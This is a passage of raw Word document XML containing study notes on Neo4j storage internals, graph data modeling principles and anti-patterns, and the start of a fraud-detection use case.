      <w:r w:rsidRPr="005C5B1F">
        <w:t>Property graph storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E61A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node store: fixed-size records, node_id → node_record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644172A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Relationship store: fixed-size records, rel_id → rel_record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3982B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Property store: linked list of property records per node/relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257F447" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Label token store: label_id → label_name string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13432D53" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E815A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Store files on disk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A251602" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    neostore.nodestore.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA5364" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    neostore.relationshipstore.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE2F86" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    neostore.propertystore.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1D577" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86E909" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Memory mapping (mmap):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6B798" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Store files memory-mapped → OS manages paging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDF3F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Hot records (frequently accessed nodes/relationships) stay in OS page cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE56250" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Cold records page out to disk automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF95C25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250E36B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431299B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Dense node (node with many relationships): slow traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D15FFD1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      A celebrity with 1M followers: traversing all followers = 1M relationship record reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003CCF8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      Solution: separate storage for dense nodes (relationship groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB09FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      Relationship groups: relationships partitioned by type for dense nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1AAB64" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                          Only load the specific type you're traversing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2DE0A3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graph Data Modeling — Designing for Neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FA7BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA27498" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Modeling principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FC5E2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0A3740B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>1. Nouns → Nodes, Verbs → Relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9E574" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6AA43F1F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Relational model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A167A01" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    users table, products table, orders table, order_items table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5347DE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (four tables with foreign keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F8B86A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C766CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Graph model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BF3AA3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (User)-[:PLACED]-&gt;(Order)-[:CONTAINS]-&gt;(Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13393E3C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (User)-[:REVIEWED {rating: 5}]-&gt;(Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16152E0F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (Product)-[:BELONGS_TO]-&gt;(Category)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4594BA02" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0C048" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Relationships are first-class data — they have properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD7708" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    No join tables needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C1E8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="720C432F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>2. Design for the most common traversal direction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A64F9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="01808AE3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query: "What did this user order?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CE58E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Model: (User)-[:PLACED]-&gt;(Order) — traversal is natural</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF502D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313C09E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query: "Who ordered this product?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D12105" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Model: (User)-[:PLACED]-&gt;(Order)-[:CONTAINS]-&gt;(Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CECC2CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Can traverse backwards with INCOMING: (p:Product)&lt;-[:CONTAINS]-(o:Order)&lt;-[:PLACED]-(u:User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F99089" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A8062" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Neo4j traverses in both directions equally — design for clarity, not performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8BF450" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="27286A32" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>3. Use relationship types as a filter mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EBE6E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="1D5C59A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Anti-pattern: (User)-[:KNOWS {type: 'friend'}]-&gt;(User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE73CE4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Pattern: (User)-[:FRIEND]-&gt;(User), (User)-[:COLLEAGUE]-&gt;(User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417FB01" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770518B9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Traversal by type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992565D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (u)-[:FRIEND]-&gt;(f)  -- only friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07E9A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (u)-[:COLLEAGUE]-&gt;(c)  -- only colleagues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B8A87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (u)-[:FRIEND|COLLEAGUE]-&gt;(connected)  -- both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E353B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED109E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Type-based traversal is more efficient than property filtering within relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A364B9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="3F5BF98E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>4. Intermediate nodes for complex events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46818916" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="7274FC49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Anti-pattern: (User)-[:PURCHASED {product_id: 123, quantity: 2, price: 45.00, date: ...}]-&gt;(User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF80EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41018FB6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Pattern: (User)-[:PLACED]-&gt;(Order {date: ..., total: ...})-[:CONTAINS {quantity: 2, price: 45.00}]-&gt;(Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F318DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500E2875" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Order is a first-class node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32FDAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Can traverse orders directly (find all orders, find orders by date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213AA247" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Relationships to Order are lightweight (no complex properties)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61703BC2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Can attach additional data to Order (shipping, payment, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B163A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="154815BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>5. When NOT to use a graph database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0976F657" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="33D512B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Simple CRUD without relationship traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103AD4CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    User profiles stored and queried by user_id → relational is better</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01FD9C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B144D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Heavy aggregation/analytical queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6A484" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Revenue by product category last month → relational or columnar is better</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A122DEC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (Cypher aggregations are less optimized than SQL on columnar storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678ABFF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B39BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Document storage with nested structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292FB47" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    JSON documents with no meaningful inter-document relationships → document DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE90C1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C444A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Time-series: sensor readings with no graph structure → time series DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C89D2E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C5F13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Graph DB excels when: relationship traversal is the primary query pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E884B9F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-World Graph Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9E5EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0586CD22" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Fraud detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F783385" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Problem: identify coordinated fraud rings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D488F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Graph: (User)-[:USES]-&gt;(Device/IP/CreditCard/Email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B58E95" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BD4E8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
